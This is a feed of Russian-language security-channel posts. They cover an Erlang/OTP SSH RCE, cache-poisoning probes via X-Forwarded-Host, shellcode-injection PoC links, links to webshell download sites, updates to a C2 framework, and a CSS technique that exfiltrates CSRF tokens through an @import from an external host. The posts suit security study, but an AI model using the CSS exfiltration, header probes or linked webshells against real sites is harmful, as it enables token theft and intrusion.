Fsecurity | HH

Critical Erlang/OTP SSH Vulnerability RCE * (CVSS 10.0) Сломали лицо фейспалмом на ровном месте. * Читать * О чем вообще речь, отбитые ребята из Erlang/OTP, когда то взяли, да и запили свою реализацию SSH (релизы от хакеров из богоПодобной OpenBSD != true) Потом пришли любители 3Dparty из RabbitMQ употребили этот релиз. Ну а дальше любители админ-панелей и кастомных CLI интерфейсов. Как зарядить простой ERLANG shell ? НУ вот ssh srv на 1337 порту:

ssh:daemon(1337, [{system_dir, "/etc/ssh"}, {user_dir, "/home/user/.ssh"}]).

Казалось бы, такую дичь еще нужно умудриться найти, НО ! поиск по шоданам\фофам\хантерам отдает: Results 27 922 Однако, здравствуйте 0_о

🕷 Эксплуатация Vary в дикой природе Заголовок HTTP-ответа Vary указывает, какие части запроса нужно учитывать при создании ключа кэша. Это помогает предотвратить атаки вроде cache poisoning. В некоторых кейсах значения заголовка Vary могут указывать, доверяет ли приложение пользовательскому вводу или отражает его в ответе. ➡️ Начальный запрос:

GET / HTTP/1.1  
Host: redacted.com

➡️ Ответ сервера:

HTTP/1.1 200 OK  
Server: Apache/2.4.37  
Vary: X-Forwarded-Host, Origin  
Content-type: text/html; charset=utf-8  
Connection: close  
Content-Length: 11512

Как видно, в ответе есть заголовок Vary, в котором указаны X-Forwarded-Host и Origin. Используем эту информацию, чтобы проверить, доверяет ли приложение пользовательскому вводу:

GET / HTTP/1.1  
Host: redacted.com  
X-Forwarded-Host: example.com

➡️ Ответ сервера:

HTTP/1.1 200 OK  
Server: Apache/2.4.37  
Vary: X-Forwarded-Host, Origin  
Content-type: text/html; charset=utf-8  
Connection: close  
Content-Length: 11509

<!DOCTYPE html>
<html>
...
<script src="https://example.com/assets/js/vendor/jquery-ui.custom.min.js"></script>
...
</html>

Что это значит? Сервер доверяет X-Forwarded-Host — он напрямую попадает в HTML. Это открывает возможность использовать X-Forwarded-Host для поиска аномального поведения. Если в некоторых ответах X-Forwarded-Host используется без добавления в Vary, то кэш можно потенциально отравить. Это может привести: — К SSRF, если заголовок прокидывается внутрь backend-запросов. — Отравлению кэша, если Vary не всегда прописан или используется неправильно. — Desync-атакам, особенно в сочетании с другими отражёнными заголовками. #техники

Control Flow Hijacking via Data Pointers. Вариант инъекции шеллкода в процессы. Blog: https://www.legacyy.xyz/defenseevasion/windows/2025/04/16/control-flow-hijacking-via-data-pointers.html Очень хорошая работа👍 Интересно тут то, что помимо публикации PoC, 0xLegacyy подробно описал все этапы разработки, начиная от идеи, и заканчивая рабочим PoC. Туда же входит и написание своей заглушки для шеллкода. P.S. обещал в скором времени опубликовать рабочий BOF)) #pentest #redteam #maldev #bypass

Discord сервер 👆🏻Тут можно пообщаться и найти много полезной информации 🦈

🔗Ссылка: https://habr.com/ru/articles/886528/

🔗Ссылка: https://www.securitylab.ru/news/558447.php/r=1

🔗Ссылка: https://habr.com/ru/companies/pt/articles/423903/

Еще две функции, которые будут поддерживаться с версии 0.4 - это период времени активности агента и время его завершения. При наведении на ячейку в столбце Sleep будет ототбражаться информация, активны ли данные параметры, а также их значения.

🔗Ссылка: https://www.securitylab.ru/news/558437.php

Discord сервер 👆🏻Тут можно пообщаться и найти много полезной информации 🦈

🔗Ссылка: https://www.securitylab.ru/news/558436.php

🔗Ссылка: https://habr.com/ru/articles/900512/

🔗Ссылка: https://www.securitylab.ru/news/558400.php

🔗Ссылка: https://habr.com/ru/companies/ru_mts/articles/900928/

🔗Ссылка: https://habr.com/ru/articles/895530/

Здрасьте я ваш webshell 😆 T1505.003 Server Software Component: Web Shell - техника из MITRE ATT&CK, при которой злоумышленник размещает вредоносный компонент (вебшелл) на сервере, чтобы получить удалённый доступ и управлять системой через веб-интерфейс 😎 Довольно излюбленная техника АРТ и вот почему: • Шумит только по запросу — пока никто не трогает, вебшелл молчит 😈 • Функционал на любой вкус — хочешь RCE, хочешь файловый менеджер, хочешь SOCKS5 прокси и т.п. 🕺 • Прячется как ниндзя — внедрён в 404.php, обфусцирован, и вот ты уже сидишь внутри 3 месяца 🪨 В процессе исследования набрёл на годноту: 🔗 https://phpshell.pro/ 🔗 https://shellizm.com/ Там можно скачать кучу вебшеллов, которые реально используются в полях. Отличный материал, чтобы писать сигнатуры, тренировать детекты и искать их в последующих хантах 😏 🧢 s0ld13r

Вчера как обычно сделал обычный пост в соц сети Илона Маска, который довольно сильно разошелся. Поэтому для тех кто читает только мой тг повторю тут. Думаю многие знакомы с CSS exfiltration, а если нет можете прочитать статью 2 летней давности на portswigger Основная идея тогда заключалась в том, чтобы с помощью CSS селекторов брутфорсить атрибуты тегов:

input[value^="a"] {
  --starts-with-a:url(/startsWithA);
}

Например так можно украсть CSRF токен, однако атака довольно нестабильная, медленная и тд. Довольно плохо реализуема. Однако я обнаружил, что начиная с Chrome 133 произошло важное изменение в функции CSS attr, раньше она могла использоваться только с content property, теперь же вы можете использовать её вместе с переменными CSS (https://developer.chrome.com/blog/advanced-attr):

form {
    --val:  attr(csrf-token);
}

--val будет содержать содержать значение атрибута csrf-token Однако мы не можем использовать такое внутри url:

form {
    --val:  attr(csrf-token);
    background: url(var(--val)); /* Correct */
}

Браузер просто проигнорирует такой property как неверный Однако на помощь опять спешат новые стандарты CSS, чтобы добиться успеха достаточно использовать image-set

form {
    --val:  attr(csrf-token);
    background: image-set(var(--val)); /* Correct */
}

После чего просто сохраняете стиль с кражей нужного поля (например атрибута value у тега input с именем csrf-token) И делаете @import с атакуемой страницы :

 @import url(https://pocs.neplox.security/css-2025-exfiltration.css);

После чего, как можно увидеть на скриншоте, через один запрос вы получите полное значение атрибута тега

Наверное, в версии 0.4 мало чего добавится, по сравнению с 0.3, но теперь агент beacon может связываться с другими агентами того же типа beacon не только по SMB, но и по TCP. P.S. в основном все время и настроение ушли на рефакторинг тимсервера🥲 P.S.S. комментам и реакциям под постом всегда рад😉

Discord сервер 👆🏻Тут можно пообщаться и найти много полезной информации 🦈

🔗Ссылка: https://opennet.ru/63089/